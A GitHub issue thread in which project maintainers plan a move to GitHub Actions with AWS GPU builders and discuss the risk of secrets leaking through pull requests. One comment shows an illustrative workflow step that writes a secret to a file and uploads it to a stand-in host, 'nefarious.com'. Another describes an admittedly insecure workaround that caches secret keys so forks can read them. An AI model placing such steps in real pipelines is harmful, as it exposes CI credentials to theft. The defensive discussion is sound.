Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Transition to GitHub Actions and enabling GPU builders #156

Closed
jmertic opened this issue Apr 14, 2020 · 21 comments
Closed

Transition to GitHub Actions and enabling GPU builders #156

jmertic opened this issue Apr 14, 2020 · 21 comments

Comments

@jmertic
Copy link
Contributor

jmertic commented Apr 14, 2020

From email thread and @jfpanisset

My understanding of some of the steps required:

  • We decided to only target GitHub Actions, since that's the where ASWF projects are moving towards, and to use OCIO as the initial project to deploy this. Support for GitHub Actions is being worked on currently in OCIO, but we will need this work to appear in the repo.
  • We will be targeting AWS, and yes apparently it is now possible to have "sub accounts" under the overall LF releng AWS account, and to target any ASWF-specific AWS credits to that sub account.
  • I think for now we can target only the OCIO nightly build out of the branch in which PRs have been merged, so we don't need to solve right away the issue of managing secrets / AWS credentials in PR forks. Of course there's still the possibility of a bad actor managing to obfuscate credential stealing code that makes it past the reviewers and gets merged into the OCIO repo, but that's a general problem that everyone has to deal with, not just us.
  • Strict limits can be set on the ASWF AWS sub account to allow it to allocate a single GPU VM, and nothing else, we can raise these limits as our needs increase.
  • Most importantly, currently the "on demand GPU VM allocation via GitHub Actions" code in https://github.com/jfpanisset/cloud_gpu_build_agent is not very robust, and in particular if the build fails, it will leave the GPU VM running and chewing up money. But that code can be improved along the way, it's not a bad idea to get GPU support going in a real world CI scenario as soon as possible.

Does that correspond to everyone's recollection of where we've ended up?

@lgritz
Copy link
Contributor

lgritz commented Apr 14, 2020

Of course there's still the possibility of a bad actor managing to obfuscate credential stealing code that makes it past the reviewers and gets merged into the OCIO repo

It would be helpful if somebody could be explicit about what that would look like, so we can give guidance to reviewers. I certainly wouldn't know what to look for.

And, for example, if it would necessarily involve retrieving something from a particular environment variable, maybe we could make a github action that is run on every PR that greps the PR for any mention of it, and then we could be confident that the PR is not a security issue?

@tykeal
Copy link

tykeal commented Apr 14, 2020

Credential stealing would be conceptually of the form:

steps:
  - shell: bash
    env:
      SUPER_SECRET: ${{ secrets.SUPER_SECRET }}
    run: |
        echo "$SUPER_SECRET" > steal_the_creds.txt
        # assume lftp or some other ftp client is installed
        lftp -u user,password -e "put steal_the_creds.txt;quit" nefarious.com

@lgritz
Copy link
Contributor

lgritz commented Apr 14, 2020

It would have to be an edit to the workflow.yml file itself, then? That seems super easy to spot, and therefore incredibly low risk of slipping by.

@tykeal
Copy link

tykeal commented Apr 14, 2020

It would have to be to the workflow.... or a script called by the workflow.

NOTE: GitHub actions automatically redacts known secrets from console logs, but it won't do something that is munging files being used by the job.

@tykeal
Copy link

tykeal commented Apr 14, 2020

Also, IIRC workflow changes will run if they are in a PR. Which I personally find dangerous, but I don't know how to work around it.

Theoretically someone could raise a PR with the nefarious change, wait for the modified action to run and then close the PR (no way to delete it).

At worst that means they get the credentials and we have an email saying that a PR was raised but nobody sees it and so the secret doesn't get rotated.

At best we see and act on it quickly.

@tykeal
Copy link

tykeal commented Apr 14, 2020

This of course would only affect folks that PRs automatically run for. I do remember something about settings to disallow any random person from just causing GHA to run.

@jfpanisset
Copy link
Contributor

I was under the impression that GitHub Actions currently explicitly does not make secrets accessible to forks of a repo, so any pre-merge PR CI workflow would be running in the context of the submitter's fork? (as opposed to Azure Pipelines which does let you flag secrets as shareable, with the caveat that this creates a potential security issue). But yes, once a PR has been merged into the main repo, it has potential access to secrets.

Some of the workflow toolchains can get quite deep and have many nested levels, see the stuff that is used to build the ASWF Docker containers for instance. And if there's a test suite, in theory obfuscated code in the project itself could grab the secret environment variable during a test run and exfiltrate it.

So reviewer vigilance will only get you so far, monitoring of cloud provider expenditures and limiting the scope of the resources that can be allocated by the secret credentials is a good way to mitigate any potential leakage of those credentials.

@lgritz
Copy link
Contributor

lgritz commented Apr 14, 2020

But if somebody submits a PR, that triggers a CI run immediately, before we have reviewed, no?

@tykeal
Copy link

tykeal commented Apr 14, 2020

@lgritz I haven't tested that, but I believe that to be the case.

@jfpanisset the fork won't get our secrets for their GHA runs, but a PR against our repo would use our secrets during the GHA run.

@jfpanisset
Copy link
Contributor

Assuming the hypothetical bad actor doesn't have commit privileges to the repo (otherwise it's game over), any changes they submit as a PR would have to come from a branch in their own forked copy of our official repo. That fork would have a copy of the GitHub Actions, but not the secrets, and pre-merge checks that are run automatically when the PR is submitted would run in the context of the forked repo without access to secrets, right? I could of course be missing something obvious.

I ran into a similar issue in the aswf-sample-project when uploading test results to CDash, where I had to add code to conditionally skip uploading for builds without access to the CDash token:

https://github.com/AcademySoftwareFoundation/aswf-sample-project/blob/master/CTestScript.cmake

This would seem to mean that GitHub Actions code has to be able to conditionally skip steps that require access to tokens that might not be present?

@tykeal
Copy link

tykeal commented Apr 14, 2020

I'll check with my team member that has even better understanding of GHA and get back to you, or better yet have him comment into this thread.

@bramwelt
Copy link

Assuming the hypothetical bad actor doesn't have commit privileges to the repo (otherwise it's game over), any changes they submit as a PR would have to come from a branch in their own forked copy of our official repo. That fork would have a copy of the GitHub Actions, but not the secrets, and pre-merge checks that are run automatically when the PR is submitted would run in the context of the forked repo without access to secrets, right? I could of course be missing something obvious.

Yep, this is absolutely correct. Sadly all of this is conveyed as a single sentence in Github's docs:

With the exception of GITHUB_TOKEN, secrets are not passed to the runner when a workflow is triggered from a forked repository.

To verify, I created a public repository with a Github Actions workflow that contained secrets, forked that repo as a user with neither write access to the repository or secrets added (to the forked copy) and created a PR back to the original repo.
As expected, the workflow failed stating the secrets weren't defined.

This would seem to mean that GitHub Actions code has to be able to conditionally skip steps that require access to tokens that might not be present?

You could do this by hardcoding the repository name into the workflow: if: github.repository == "AcademySoftwareFoundation/tac", but depending on the workflow that may render the rest of it moot.

@tykeal
Copy link

tykeal commented Apr 15, 2020

@bramwelt do we know of a way to allow forked repos of committers to execute with the secrets?

@bramwelt
Copy link

@tykeal There's currently not a way to share secrets with forks without explicitly adding them to the forked repositories.

@danrbailey
Copy link
Contributor

The GitHub Actions team are apparently looking into this, but it's a big hole in this toolset right now.

@tykeal There's currently not a way to share secrets with forks without explicitly adding them to the forked repositories.

Actually, that's not even true. I wrongly assumed this and went down a blind alley for a while. :/

This is the situation you're describing:

base/master <- fork/branch (read secret from fork/secrets)

And the reply from the GitHub Actions team about this when I enquired:

When a PR is created from fork repo to base repo, the actor of the workflow is the user that opened the pull request, the workflow starts on the base repo. The base repo workflow cannot read the secrets existing on forked repo.

So you cannot simply add the secrets to the fork repo unfortunately (and implied in the above is that the base repo workflow cannot access the secrets existing on the base repo because it's running under the user that opened the PR).

The approach I have found to get around this is not secure, but is better than the alternative of adding the secret key as plaintext to the repo. For our case it was getting access to a download of Houdini that lives behind a secret key. I have used a regular, weekly GitHub Actions cron workflow that runs on the base repo which has access to the secret key and puts the Houdini download into the GitHub Actions cache. It's a bit of configuring to get it right, but the cache can be read by the fork repo through the restore-keys options:

https://help.github.com/en/actions/configuring-and-managing-workflows/caching-dependencies-to-speed-up-workflows#using-the-cache-action

In theory a similar approach could work here - put the secret keys into a file that you put into the GitHub Actions cache and then read it directly from the fork. The GitHub Actions cache cannot be read outside of a fork PR, so you'd at least be aware of when someone has attempted to access it. However, this has a major limitation in that these caches are cleaned up sporadically and have somewhat arbitrary limits.

Hopefully they fix all of this soon or at least expose the same toggle as Azure pipelines so we can more easily opt-out of being secure.

@michdolan
Copy link
Contributor

FYI: This PR adds GH Actions to OCIO CI:
AcademySoftwareFoundation/OpenColorIO#991

@bcipriano
Copy link
Contributor

bcipriano commented Apr 20, 2020 via email

@michdolan
Copy link
Contributor

As a follow up to our discussion from the April 1 CI working group meeting:

OCIO is now fully moved to GH Actions:
https://github.com/AcademySoftwareFoundation/OpenColorIO/actions

I have opened a helpdesk ticket with LF release engineering requesting AWS setup:
https://jira.linuxfoundation.org/servicedesk/customer/portal/2/IT-19573

Thanks all!

@dheckenberg
Copy link
Contributor

Thanks for the detail and follow ups here everyone.

@tykeal
Copy link

tykeal commented Jun 15, 2020

We've now got a CodeBuild IAM defined that will allow us to run CodeBuild projects in us-west-2. The ID and SECRET are available in the org wide secret store.

We'll need to configure CodeBuild projects that are used and then referenced per https://github.com/marketplace/actions/aws-codebuild-run-build-action-for-github-actions

@michdolan
Copy link
Contributor

Thanks again all for helping OCIO get GPU CI up and running! Here's the GHA workflow for reference, which is now running on each merge and working well:
https://github.com/AcademySoftwareFoundation/OpenColorIO/actions?query=workflow%3AGPU

This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants